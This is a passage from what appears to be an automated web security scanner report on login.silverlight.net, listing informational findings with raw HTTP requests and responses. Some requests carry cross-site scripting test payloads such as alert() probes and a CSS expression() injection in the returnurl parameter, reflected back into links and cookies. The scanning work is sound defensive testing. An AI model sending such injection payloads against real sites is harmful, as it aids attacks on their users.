<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296391153&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296391153&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.149. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=tdmhefel1tt0o2454x0bgy45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:00:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:50:28 GMT
Content-Length: 13160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402628&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402628&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402628&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.150. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:35:32 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:25:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343532&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343532&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343532&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.151. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=estxpnefl0jux055r4kdsjai; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:44 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343424&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343424&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343424&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.152. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20 HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:32:52 GMT
Content-Length: 12978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351171&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351171&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296351171&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3D%27%22%20ns%3Dalert(0x0000C7)%20&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.153. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13089
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:01:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:51:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402685&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402685&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296402685&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.154. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=m0cc0c5543utnq45iihsjzq0; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:34:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:24:49 GMT
Content-Length: 13160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343488&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343488&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343488&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.155. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ezlsvr2tttmxii3pjitfng45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Content-Length: 13160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343042&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343042&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296343042&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.156. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 26

renderableItem=%2Fshow%2F0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iw0tmg555utr4x45q5l5ju45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:56:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:33 GMT
Content-Length: 13452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...
<p class="no_lines"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344793&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
</p>
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344793&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344793&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx981cd%22style%3D%22x:expression(alert(1))%2227f64f44305&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.157. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:51:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:41 GMT
Content-Length: 15108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<p class="link_not_member">If you would rather use Windows Live ID to sign-in, click <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344500&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fsignin.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&amp;lc=1033&amp;id=265631">here</a>
...[SNIP]...

22.158. https://login.silverlight.net/login/signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

POST /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
